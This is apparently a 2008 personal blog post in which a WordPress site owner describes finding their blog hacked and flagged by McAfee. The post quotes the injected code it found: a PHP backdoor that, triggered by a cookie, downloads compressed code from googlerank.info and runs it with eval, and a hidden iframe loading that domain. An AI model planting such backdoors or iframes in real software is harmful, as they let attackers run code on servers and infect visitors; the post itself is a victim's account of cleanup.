TapI wuz hacked

Some time recently (at least I hope it was recently) someone has hacked this blog. It was very subtle and I only discovered when a friend said that she could no longer get to even my home page. She uses McAfee security system and got the message

googlerank.info/counter may cause a breach of browser security.

*Why were you redirected to this page?* When we tested, this site attempted to make unauthorized changes to our test PC by exploiting a browser security vulnerability. This is a serious security threat which could lead to an infection of your PC.

The McAfee information page had more details. I had a hunt around and couldn’t see any mention of this googlerank.info site and no iframes and was beginning to think it was a false alarm. But looking at the page source of the front blog page via the view menu in Firefox, I spotted a small line of code apparently advertising a DVD download site. I can’t show it to you now because I forgot to save a copy but it was rather odd. It was designed not to display (using CSS) so must have been there only for the search engine linking credit; also, it made no mention of the googlerank.info site. It was just before the footer code and didn’t appear on any other blog pages so I was drawn to my theme index.php page and, sure enough, between <?php get_sidebar(); ?> and <?php get_footer(); ?> was the offending line of code. Checking over the rest of the file I found another piece immediately after the initial <?php which did mention the offending googlerank.info stuff which was as follows:—

if (isset($_COOKIE['pird']) or isset($_GET['pird'])) {
if (!isset($_COOKIE['pird'])) setcookie('pird', '12313.412',time()+60*60*24*600);
eval(gzuncompress(file_get_contents('http://googlerank.info/soft/faq.compressed')));
exit;
}

I am not exactly sure what it does, the file referenced seems to be missing, but I have chopped the code out now. A Google search doesn’t come with any hits for this type of hack.

What is worrying is that I don’t know how they got in. I had a good admin password which I have now changed for an even better one. I should also refresh the theme code from source in case there are other changes that I haven’t seen. I will need to look seriously at updating to the latest WordPress version, or perhaps the problem is file permissions? Or is my hosting service compromised? Also, do I need to tell some database somewhere that I am safe again, McAfee seems to have already white-listed me? I can see that there is no point in these security companies telling deliberately malicious sites that they are blacklisted but it would be useful for those of us who have been unknowingly hacked.

As a result I have a lot more respect for McAfee than I did before, I see they also know that the site is hosted in Canada.

Update: Looking around I found that the main site index.htm was also modified. It had the well known line

<iframe src=http://googlerank.info/counter style=display:none></iframe>

so this is probably what McAfee was seeing. What I still don’t know is how it was done. None of the file or directory protections are bad and the date on the files attacked is the same as the original. I have now refreshed everything so it should be clean but if you don’t know how then it remains a concern.

Update 2: Mtekk’s Crib seems to have found a similar problem.

Update 3: Creative Briefing has experienced a similar problem using WordPress version 2.3.3 (the current one at 13-Mar-2008). This is very worrying.

Comments are closed.

^ Top